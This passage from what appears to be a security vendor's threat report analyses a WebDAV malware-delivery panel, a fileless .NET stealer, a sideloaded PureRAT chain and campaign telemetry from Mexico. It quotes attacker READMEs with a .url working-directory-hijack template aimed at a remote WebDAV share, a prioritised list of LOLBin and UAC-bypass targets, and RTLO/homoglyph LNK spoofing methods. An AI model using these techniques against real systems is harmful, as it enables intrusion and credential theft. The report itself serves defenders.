         &amp;crumb=location:\\onedrive.cv@80\Downloads\CURP</pre><p>⠀<br><span>It's worth mentioning that the malicious Javascript with russian comments appears to be also generated with the help of GenAI. As you can see in the screenshot above it contains emojis and comments which are very typical for the LLM models.</span></p><p><span>The exposed Simba Service panel tied this phishing flow back to the attacker’s delivery infrastructure. The </span><span><span data-type="inlineCode">CURP</span></span><span> folder was the most-accessed campaign folder, with 2,384 recorded interactions. The same count appeared for </span><span><span data-type="inlineCode">ReportFinal.rcs.pdf</span></span><span>, making it the clearest link between the phishing site, the WebDAV delivery path, and active campaign activity.</span><br></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltedc57850fe037c68/6a5e15175e34b039dfdfd8bf/Simba-Service-WebDAV-dashboard-CURP.png" alt="Simba-Service-WebDAV-dashboard-CURP.png" caption="Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltedc57850fe037c68/6a5e15175e34b039dfdfd8bf/Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-uid="bltedc57850fe037c68" data-sys-asset-filename="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions." data-sys-asset-alt="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions.</figcaption></div></figure><p>⠀</p><p><span>Although </span><span><span data-type="inlineCode">ReportFinal.rcs.pdf</span></span><span> appeared to be a PDF, it was actually a right-to-left override (RTLO) masqueraded </span><span><span data-type="inlineCode">.scr</span></span><span> executable built with a Delphi/Inno Setup installer. Once executed, it extracted and launched the </span><span><span data-type="inlineCode">Fo-Binary.exe</span></span><span> loader, initiating the multi-stage infection chain.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf312b78111eb9912/6a5e15916d22612fa5454d67/Execution-chain-PDF-lure.jpg" alt="Execution-chain-PDF-lure.jpg" caption="Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Execution-chain-PDF-lure.jpg" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf312b78111eb9912/6a5e15916d22612fa5454d67/Execution-chain-PDF-lure.jpg" data-sys-asset-uid="bltf312b78111eb9912" data-sys-asset-filename="Execution-chain-PDF-lure.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration." data-sys-asset-alt="Execution-chain-PDF-lure.jpg" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration.</figcaption></div></figure><p>⠀</p><p><span>The final payload was an unknown .NET information stealer, operated entirely fileless-ly to evade disk-based detection. The execution sequence followed as such:</span></p><ul><li><span><strong>Decryption:</strong></span><span> The </span><span><span data-type="inlineCode">Fcqleh</span></span><span> loader decrypted the embedded payload using AES and GZip.</span></li><li><p><span><strong>Reflective Loading: </strong></span><span>The loader mapped the payload directly into memory using the </span><span><span data-type="inlineCode">Assembly.Load(byte[])</span></span><span> API.</span></p></li><li><p><span><strong>Process Injection:</strong></span><span> The malicious code was executed inside a legitimate, EV-signed Qihoo 360 process via process hollowing, allowing the malicious code to run under a trusted signed process image.</span></p></li></ul><p><span>The decrypted in-memory configuration exposed the payload’s feature set and version </span><span><span data-type="inlineCode">4.4.3</span></span><span>. It also contained the build tag </span><span><span data-type="inlineCode">06x12x2026SantaEbash2</span></span><span>, which matched toolkit timestamps from June 12, 2026.</span></p><p><span>Once running, the stealer targeted cryptocurrency assets, browser data, messaging sessions, and local application data. Its collection logic included around 20 desktop wallet clients and browser wallet extensions, saved browser usernames, passwords, cookies, session tokens, the Telegram </span><span><span data-type="inlineCode">tdata</span></span><span> session database, Foxmail data, and a screenshot of the victim’s desktop.</span></p><p><span>The payload also included anti-analysis checks. The payload checked for the </span><span><span data-type="inlineCode">COR_PROFILER</span></span><span> environment variable and called </span><span><span data-type="inlineCode">IsDebuggerPresent</span></span><span>. If the malware detected that it was being monitored or debugged, it immediately called </span><span><span data-type="inlineCode">FailFast</span></span><span> to kill the process. The stealer also delayed decrypting its watchlist and collection configuration until after a successful C2 handshake, preventing its full functionality from being revealed in isolated sandboxes. </span></p><p><span>Collected data was exfiltrated to </span><span><span data-type="inlineCode">77[.]110.127.205</span></span><span> (alias </span><span><span data-type="inlineCode">google.services.ug</span></span><span>, certificate </span><span><span data-type="inlineCode">CN=Eglgyqnoa</span></span><span>) over </span><span><span data-type="inlineCode">SslStream</span></span><span> (TLS without SNI) and raw </span><span><span data-type="inlineCode">Socket</span></span><span>.</span><span>The stolen data was sent as a multipart HTTP POST request to </span><span><span data-type="inlineCode">/c2</span></span><span>.</span></p><p><span>Based on the analyzed behavior, the payload functioned as an information stealer focused on credential, wallet, and session theft.</span></p><h2>Case study 2: The "DlrtyGames" sideloading chain</h2><p><span>While the </span><span><span data-type="inlineCode">ReportFinal</span></span><span> lure used an Inno Setup installer to launch a fileless stealer, a second campaign directory on the server, </span><span><span data-type="inlineCode">DlrtyGames</span></span><span>, showed a different delivery architecture. This chain was built to deploy a modular RAT through DLL sideloading, IDAT, process hollowing, and persistence.</span></p><p><span>The </span><span><span data-type="inlineCode">DlrtyGames</span></span><span> chain began with a silent 7-Zip SFX dropper, </span><span><span data-type="inlineCode">DlrtyGames.exe</span></span><span>. It extracted a benign, signed Ubisoft binary, </span><span><span data-type="inlineCode">Volt_Droid.exe</span></span><span>, into the victim’s temporary directory alongside a trojanized dependency, </span><span><span data-type="inlineCode">discord-rpc.x64.dll</span></span><span>. </span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf89ec69e4241e5c3/6a5e1707745c95057f3acb23/DlrtyGames-execution-chain.jpg" alt="DlrtyGames-execution-chain.jpg" caption="Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="DlrtyGames-execution-chain.jpg" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf89ec69e4241e5c3/6a5e1707745c95057f3acb23/DlrtyGames-execution-chain.jpg" data-sys-asset-uid="bltf89ec69e4241e5c3" data-sys-asset-filename="DlrtyGames-execution-chain.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution." data-sys-asset-alt="DlrtyGames-execution-chain.jpg" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution.</figcaption></div></figure><p>⠀</p><p><span><span data-type="inlineCode">Volt_Droid.exe</span></span><span> used DLL sideloading to load </span><span><span data-type="inlineCode">discord-rpc.x64.dll</span></span><span>. This decoded its configuration, resolved APIs by hash, and manually mapped </span><span><span data-type="inlineCode">profiler16.dll</span></span><span>. The mapped </span><span><span data-type="inlineCode">profiler16.dll</span></span><span> stage then read </span><span><span data-type="inlineCode">loader-pool.db</span></span><span>, a PNG file whose encrypted modules were stored across IDAT chunks. After a 45-second sleep delay, it reassembled and decrypted the embedded content, set up persistence, performed COM auto-elevation through </span><span><span data-type="inlineCode">dllhost.exe</span></span><span>, and prepared the final hollowing stage.</span></p><p><span>The final injection stage was handled by an x86 PIC shellcode blob carved from </span><span><span data-type="inlineCode">loader-pool.db</span></span><span> at offset </span><span><span data-type="inlineCode">0xb516a</span></span><span>. That shellcode created signed host processes such as </span><span><span data-type="inlineCode">MegArray.exe</span></span><span> or </span><span><span data-type="inlineCode">Crisp.exe</span></span><span> in a suspended state, unmapped their original image, wrote the payload into the process, updated thread context, and resumed execution. The result was a modular .NET RAT running inside a signed host process.</span></p><p><span>The </span><span><span data-type="inlineCode">DlrtyGames</span></span><span> payload was a modular RAT with plugins for keylogging, screenshots, window monitoring, and C2 communication. Its keylogger module used plaintext keyword triggers for payment, banking, credit, and cryptocurrency activity, including </span><span><span data-type="inlineCode"><em>relaypayments.com</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>plaid</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>fiservapps</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>payoneer</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>google pay</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>coinbase</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Zelle</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>paypal</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>link.com</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>amazonrelay</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Exodus</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Electrum</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Bitcoin</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>monero</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Seed Phrase</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Seed</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>12</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>FCU</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Credit Union</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Account Overview</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Available Balance</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>Merchant</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>online access</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>debit</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>credit</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>cvv</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>card</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>settlement</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>fees</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>loans</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>bank</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>banking</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>finance</em></span></span><span><em>, and </em></span><span><span data-type="inlineCode"><em>invest</em></span></span><span><em>. </em></span></p><p><span>The RAT also targeted browser wallet-extension artifacts and Chrome user data, including cookies and saved login data.</span></p><p><span>The two chains used different payloads and C2 infrastructure. In case study one, the stealer exfiltrated to </span><span><span data-type="inlineCode">77[.]110[.]127[.]205:56003</span></span><span>, while in the case study two stealer chain communicated with </span><span><span data-type="inlineCode">23[.]94[.]252[.]228:57666</span></span><span>. Based on our observations, the final RAT payload in both chains was identified as .NET-based PureRAT.</span></p><h3>GenAI adoption</h3><p><span>Several artifacts make it clear the attacker certainly used LLMs to build and iterate this operation. The directory is packed with structured README files, neatly formatted lure-generation guides, detailed test writeups, and matrix-style outputs that look exactly like templated or generated content. </span></p><p><span></span></p><pre language="c">═══════════════════════════════════════════════════════════════════
  WORKING DIRECTORY HIJACKING — COMPREHENSIVE TEST KIT
  for Windows 11 24H2
═══════════════════════════════════════════════════════════════════

This kit contains 59 .url files targeting different Windows binaries
that POTENTIALLY have the same Working Directory hijacking issue as
CVE-2025-33053 (Stealth Falcon, iediagcmd.exe).

ALL .url files use this exact format (same as the real APT attack):
  [InternetShortcut]
  URL=C:\path\to\target.exe         &lt;- legitimate binary
  WorkingDirectory=\\[REDACTED]@80\Downloads   &lt;- WebDAV (triggers WebClient!)
  ShowCommand=7                     &lt;- start minimized (hide alert windows)
  IconIndex=13                      &lt;- (decoy icon)
  IconFile=msedge.exe               &lt;- (decoy icon)

═══════════════════════════════════════════════════════════════════
HOW TO TEST (5 minutes)
═══════════════════════════════════════════════════════════════════

STEP 1: Upload ALL files from WEBDAV_PAYLOADS/ folder to:
        \\[REDACTED]\Downloads\
        (59 test files - each is 5KB MessageBox popup exe)

STEP 2: Copy I_LOLBIN_URLS/ folder to your Win11 24H2 machine

STEP 3: Double-click .url files one by one (or all of them in sequence)
        - If popup appears -&gt; HIJACK WORKS! Read parent process name in popup.
        - If nothing happens / error -&gt; doesn't work, move to next.

STEP 4: Tell me which I-numbers showed a popup. I'll integrate working
        ones as new methods in web-renamer.

═══════════════════════════════════════════════════════════════════
PRIORITY TESTING ORDER (most likely to work first)
═══════════════════════════════════════════════════════════════════

TIER 1 - CONFIRMED IN THE WILD:
  I01_iediagcmd.url           - CVE-2025-33053 (needs pre-June 2025 patch)
  I02_CustomShellHost.url     - CheckPoint research (may not exist on Server)

TIER 2 - .NET FRAMEWORK TOOLS (always installed if .NET 4.x present):
  I03_InstallUtil.url         - InstallUtilLib.dll search
  I04_RegAsm.url              - .NET registration
  I05_RegSvcs.url             - .NET services
  I06_CasPol.url              - .NET security policy
  I07_ngentask.url            - NGen native compile (calls ngen.exe!)
  I08_AddInUtil.url           - AddIn util (calls AddInProcess.exe!)
  I10_dfsvc.url               - ClickOnce service
  I15_csc.url                 - C# compiler (may call link.exe)
  I16_vbc.url                 - VB compiler

TIER 3 - WIN11 SYSTEM .NET TOOLS:
  I17_LbfoAdmin.url           - NIC teaming admin
  I19_UevAgentPolicyGenerator.url - UE-V agent (calls .ps1 files!)
  I20_UevAppMonitor.url       - UE-V monitor
  I23_AppVStreamingUX.url     - App-V streaming UI

TIER 4 - LOLBAS Execute-EXE binaries:
  I26_Pcwrun.url              - LOLBAS Execute(EXE)
  I28_WorkFolders.url         - LOLBAS Execute(EXE,Rename)
  I33_stordiag.url            - LOLBAS Execute(EXE) - calls systeminfo etc
  I36_Provlaunch.url          - LOLBAS Execute(CMD) - calls provtool.exe!

TIER 5 - UAC bypass binaries (worth testing):
  I49_fodhelper.url, I50_computerdefaults.url, I52_wsreset.url

═══════════════════════════════════════════════════════════════════
THE THEORY (so you understand WHY this works for some and not others)
═══════════════════════════════════════════════════════════════════

For the attack to succeed, the LOLBin must:
  1. Be a .NET application, OR call ShellExecute/CreateProcess with bare
     name (no full path).
  2. Spawn a child process by NAME (e.g. "ipconfig.exe") not by full path
     (e.g. "C:\Windows\System32\ipconfig.exe").
  3. Be runnable without command-line args.

If ANY of these is false, the hijack fails. Microsoft has been patching
specific binaries (iediagcmd.exe in June 2025) but the general pattern
remains. New vulnerable binaries are discovered regularly.

═══════════════════════════════════════════════════════════════════
WHAT THE POPUP TELLS YOU
═══════════════════════════════════════════════════════════════════

When hijack works, you'll see:
  TEST OK - Working Directory Hijack SUCCESS

  Executed as: route.exe                              &lt;- which name was hijacked
  Full path: \\[REDACTED]@80\Downloads\route.exe    &lt;- ran from WebDAV!
  Working dir: \\[REDACTED]@80\Downloads
  Parent process: iediagcmd                           &lt;- which LOLBin spawned it

═══════════════════════════════════════════════════════════════════
NOTES
═══════════════════════════════════════════════════════════════════

* Some I-files may target binaries that DON'T EXIST on your Win11 24H2
  (e.g. I02_CustomShellHost was missing on my test Server 2025).
  These will silently fail - just move on.

* Some I-files may launch the GUI tool (msconfig, dxdiag, etc.) WITHOUT
  triggering any hijack. That's fine - if no popup appears, no hijack.

* See _MAPPING.csv for full mapping of each .url to its target binary
  and expected child process names.</pre><p><span><em>Figure 7: Context of README.md found in the exposed directory.</em></span><em><br></em><br><span>The attacker left a build-time artifact inside the </span><span><span data-type="inlineCode">generate_test_lnk.ps1</span></span><span> output. The output directory is hardcoded in the </span><span><span data-type="inlineCode">$outDir</span></span><span> variable and exposes part of the attacker’s local project tree:</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f481d0cd28d6929/6a5e17f7b52ffd407785a683/Hardcoded-%24outDir-path.png" alt="Hardcoded-$outDir-path.png" caption="Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Hardcoded-$outDir-path.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f481d0cd28d6929/6a5e17f7b52ffd407785a683/Hardcoded-$outDir-path.png" data-sys-asset-uid="blt5f481d0cd28d6929" data-sys-asset-filename="Hardcoded-$outDir-path.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree." data-sys-asset-alt="Hardcoded-$outDir-path.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree.</figcaption></div></figure><p>⠀<em><br></em><span>It is therefore apparent that the entire campaign was likely created using the </span><a href="https://github.com/Akash-nath29/Coderrr" target="_blank"><span>CodeRRR project</span></a><span> with the help of LLM to assist with code generation and campaign development.</span></p><p><span>Another file we found in the directory was </span><span><span data-type="inlineCode">Simba_Service_Presentation.htm</span></span><span>, which appeared to document an attacker-controlled WebDAV delivery/admin panel. The panel also seems to have been generated with LLM assistance, based on its presentation-style formatting, API-documentation structure, emojis, and implementation details.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a0d6970395b2772/6a5e18471d6cdc8240fb0a26/Simba-server-screenshot-panel.png" alt="Simba-server-screenshot-panel.png" caption="Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-server-screenshot-panel.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a0d6970395b2772/6a5e18471d6cdc8240fb0a26/Simba-server-screenshot-panel.png" data-sys-asset-uid="blt8a0d6970395b2772" data-sys-asset-filename="Simba-server-screenshot-panel.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture." data-sys-asset-alt="Simba-server-screenshot-panel.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture.</figcaption></div></figure><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c958992fad5cb62/6a5e18d6f480d88e07286a8a/Simba-server-system-requirements.png" alt="Simba-server-system-requirements.png" caption="Figure 10: Simba service system requirements." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-server-system-requirements.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c958992fad5cb62/6a5e18d6f480d88e07286a8a/Simba-server-system-requirements.png" data-sys-asset-uid="blt3c958992fad5cb62" data-sys-asset-filename="Simba-server-system-requirements.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 10: Simba service system requirements." data-sys-asset-alt="Simba-server-system-requirements.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 10: Simba service system requirements.</figcaption></div></figure><p>⠀</p><p><span>The most telling artifact was a “comprehensive test kit” that expanded the single CVE-2025-33053 technique into 59 </span><span><span data-type="inlineCode">.url</span></span><span> files targeting different Windows binaries, such as .NET tools (</span><span><span data-type="inlineCode">InstallUtil</span></span><span>, </span><span><span data-type="inlineCode">RegAsm</span></span><span>, </span><span><span data-type="inlineCode">RegSvcs</span></span><span>, </span><span><span data-type="inlineCode">ngentask</span></span><span>), system utilities, LOLBAS execute-EXE binaries, and even UAC-bypass candidates. Each file was paired with a stated theory of why the working-directory hijack should work and a priority order for testing.</span></p><p><span>The directory was saturated with structured README files, neatly formatted lure-generation guides, matrix-style test write-ups, emoji-heavy admin-panel documentation, and a </span><span><span data-type="inlineCode">_MAPPING.csv</span></span><span> tying each test file to its target binary and expected child process. The consistency, verbosity, and sheer volume of organized artifacts led us to conclude that the attacker likely used an LLM-assisted workflow to do much of the heavy lifting around documentation, structure, and iteration.</span></p><p></p><pre language="c"># LNK Full Matrix Test — WebDAV Open Methods + Deception Techniques

**Location:** `C:\Users\Administrator\Desktop\LNK-Full-Matrix-Test`  
**Total files:** 60  
**Generated:** 2026-05-30

---

## Overview / Обзор

This folder contains a complete test matrix of **60 LNK shortcut files** combining all available WebDAV open methods with all LNK Deception Techniques supported by the Web-renamer project.

В этой папке находится полная тестовая матрица из **60 LNK-ярлыков**, объединяющих все доступные WebDAV-методы открытия со всеми техниками обмана LNK, поддерживаемыми проектом Web-renamer.

---

## Naming Scheme / Схема именования

All files follow the pattern:  
Все файлы следуют шаблону:

```
HyperPackSetup.&lt;method&gt;.&lt;trick&gt;.&lt;spoof&gt;.lnk
```

- **`HyperPackSetup`** — base filename / базовое имя файла
- **`&lt;method&gt;`** — WebDAV open method (e.g. `curl-http-temp-run`, `direct`, `cmd-start`) / метод открытия WebDAV
- **`&lt;trick&gt;`** — LNK deception technique (`standard`, `SPOOFEXE_HIDEARGS_DISABLETARGET`, etc.) / техника обмана LNK
- **`&lt;spoof&gt;`** — RTLO + homoglyph extension spoof (`‮ƒｄᴘ`) — visually appears as `.pdf` / спуф расширения через RTLO + гомоглифы — визуально выглядит как `.pdf`
- **`.lnk`** — real extension / реальное расширение

&gt; The spoof is applied **only to the extension** at the end, so the method and trick names remain clearly readable.  
&gt; Спуф применяется **только к расширению** в конце имени, поэтому названия методов и техник остаются читаемыми.
...</pre><p><span><em>Figure 11: This is a snippet from another </em></span><span><span data-type="inlineCode"><em>README.md</em></span></span><span><em>. The full README is available on Rapid7 Labs' </em></span><a href="https://github.com/rapid7/Rapid7-Labs/tree/main/IOCs/Simba%20Panel" target="_blank"><span><em>Github</em></span></a><span><em>. The text is original, and the translation to Russian was not added by us.</em></span></p><h3>OPSEC is hard </h3><p><span>As we mentioned previously, one of the artifacts we found in the open directory was a presentation file documenting a WebDAV delivery/admin panel called “Simba Service.”</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte7a569d4a484149e/6a5e199e1abad5303f7de1ad/simba-service-presentation.png" alt="simba-service-presentation.png" caption="Figure 12: Simba service presentation." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="simba-service-presentation.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte7a569d4a484149e/6a5e199e1abad5303f7de1ad/simba-service-presentation.png" data-sys-asset-uid="blte7a569d4a484149e" data-sys-asset-filename="simba-service-presentation.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 12: Simba service presentation." data-sys-asset-alt="simba-service-presentation.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 12: Simba service presentation.</figcaption></div></figure><p>⠀</p><p><span>The panel was built to manage a read-only WebDAV file share and track delivery activity in real time, including file opens, visitor IPs, geolocation, Windows versions, traffic, errors, folder-level conversion, and access events.</span></p><p><span>The actor not only used the same server for testing and staging files, but also recklessly left behind internal documentation for the backend used to manage and track delivery. The presentation reads like an internal build document, walking through the architecture, tech stack, API endpoints, authentication, logging, analytics, bug fixes, deployment setup, and panel access flow. It also included the panel IP and port, along with credentials.</span></p><p><span>Additionally, the file also looked like it was generated with an LLM. Its structured project overview, emoji-heavy sections, API-documentation format, and implementation details stood out. Basically, in some subfolders you can find LLM-generated READMEs with lures and malicious executables, while in another subfolder there is an admin panel with a hardcoded IP, port, and credentials.</span></p><p><span>We are intentionally withholding live access details, credentials, IP addresses, ports, and panel locations.</span></p><h3>Delivery panel overview</h3><p><span>The attacker appeared to have deployed the panel as-is, without changing the default password or port. The panel included several operator-facing sections: Review, Folders, Files, Visitors, Geography, Traffic/Server, Notes, File Manager, Users, Link Builder, Safety, and Documentation.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt20dc8a76cc4cdc10/6a5e1a005e34b09034dfd8cd/simba-service-page-with-blocking-capabilities_.png" alt="simba-service-page-with-blocking-capabilities_.png" caption="Figure 13: Simba service page with blocking capabilities." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt20dc8a76cc4cdc10/6a5e1a005e34b09034dfd8cd/simba-service-page-with-blocking-capabilities_.png" data-sys-asset-uid="blt20dc8a76cc4cdc10" data-sys-asset-filename="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 13: Simba service page with blocking capabilities." data-sys-asset-alt="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 13: Simba service page with blocking capabilities.</figcaption></div></figure><p>⠀</p><p><span>The portal was capable of detecting scanners and bots by analyzing behavioral indicators, including requests for non-existent resources, HTTP 404 responses, WebDAV probes, and directory enumeration attempts. Based on these observations, it assigned a risk score to each IP address and allowed the operator to manually block flagged hosts. Portal records indicate that the blocking configuration was modified at least 3 times during the campaign (June 5, June 10, and June 20).</span></p><p><span>We analyzed telemetry from the WebDAV delivery service over an approximately 5.5-day window (June 20–26, 2026 UTC), which recorded 77,098 requests from 3,892 unique client IPs across 101 countries, with roughly 45.9 GB transferred.</span></p><p><span>The activity was short-lived and high-volume, peaking between June 21 and June 24 before dropping sharply. Based on this data we can assume that it was a targeted delivery campaign.</span></p><p><span>Most of the launch activity came from one specific lure: a CURP-themed fake PDF report under the </span><span><span data-type="inlineCode">/Downloads/CURP/ReportFinal.rcs.pdf</span></span><span> (RTLO-spoofed </span><span><span data-type="inlineCode">.scr</span></span><span> executable.) Out of 2,441 observed executable launch events, 2,384, or approximately 97.7%, were tied to this lure. It accounted for approximately 14.6 GB of traffic and was accessed by 1,869 unique client IPs.</span></p><p><span>The WebDAV traffic was heavily concentrated in Mexico. Mexico generated 63,622 requests, representing 82.5% of all traffic, and 2,365 launch events, or approximately 96.9% of all observed launches. The next largest sources of traffic, including the United States and Germany, produced far fewer launch events and appeared more consistent with scanning, research, or automated retrieval.</span></p><p><em></em></p><table><colgroup data-width="1250"><col><col><col><col><col></colgroup><tbody><tr><td><p><span><strong>Country</strong></span></p></td><td><p><span><strong>Requests</strong></span></p></td><td><p><span><strong>Share of requests</strong></span></p></td><td><p><span><strong>Unique client IPs</strong></span></p></td><td><p><span><strong>Launch events</strong></span></p></td></tr><tr><td><p><span>Mexico</span></p></td><td><p><span>63,622</span></p></td><td><p><span>82.5%</span></p></td><td><p><span>2,698</span></p></td><td><p><span>2,365</span></p></td></tr><tr><td><p><span>United States</span></p></td><td><p><span>4,032</span></p></td><td><p><span>5.2%</span></p></td><td><p><span>463</span></p></td><td><p><span>47</span></p></td></tr><tr><td><p><span>Germany</span></p></td><td><p><span>2,751</span></p></td><td><p><span>3.6%</span></p></td><td><p><span>59</span></p></td><td><p><span>1</span></p></td></tr><tr><td><p><span>United Kingdom</span></p></td><td><p><span>645</span></p></td><td><p><span>0.8%</span></p></td><td><p><span>40</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Netherlands</span></p></td><td><p><span>532</span></p></td><td><p><span>0.7%</span></p></td><td><p><span>49</span></p></td><td><p><span>1</span></p></td></tr><tr><td><p><span>France</span></p></td><td><p><span>407</span></p></td><td><p><span>0.5%</span></p></td><td><p><span>21</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Finland</span></p></td><td><p><span>401</span></p></td><td><p><span>0.5%</span></p></td><td><p><span>6</span></p></td><td><p><span>10</span></p></td></tr><tr><td><p><span>Brazil</span></p></td><td><p><span>343</span></p></td><td><p><span>0.4%</span></p></td><td><p><span>41</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Republic of Korea</span></p></td><td><p><span>312</span></p></td><td><p><span>0.4%</span></p></td><td><p><span>16</span></p></td><td><p><span>1</span></p></td></tr></tbody></table><p><span><em>Table 3: Geographic distribution of WebDAV delivery activity.</em></span></p><p><span><em></em></span></p><p><span>Mexico was not only the largest source of traffic, but also the source of nearly all observed launch activity. Within Mexico, the activity was geographically broad, spanning hundreds of cities rather than clustering around a single locality. The top five Mexican cities accounted for approximately 27.4% of Mexican launch events, with Mexico City alone accounting for approximately 15.7%.</span></p><p><span>Hourly requests to the WebDAV delivery service also supported the assessment that much of the traffic came from real user interaction rather than only automated internet scanners. Traffic peaked between 16:00 and 19:00 UTC, which corresponds to working hours in central Mexico.</span></p><p><span>By launch events, we mean cases where the WebDAV panel showed that a client opened or requested an executable file in a way that looked like an attempted run, such as a </span><span><span data-type="inlineCode">GET</span></span><span> request for an </span><span><span data-type="inlineCode">.scr</span></span><span> or </span><span><span data-type="inlineCode">.exe</span></span><span> file from the delivery share. This does not mean we confirmed malware execution on the endpoint. It means the delivery infrastructure saw the file being accessed or invoked.</span></p><h2>Protocol behavior</h2><p><span>The HTTP methods and status codes show how clients interacted with the WebDAV delivery 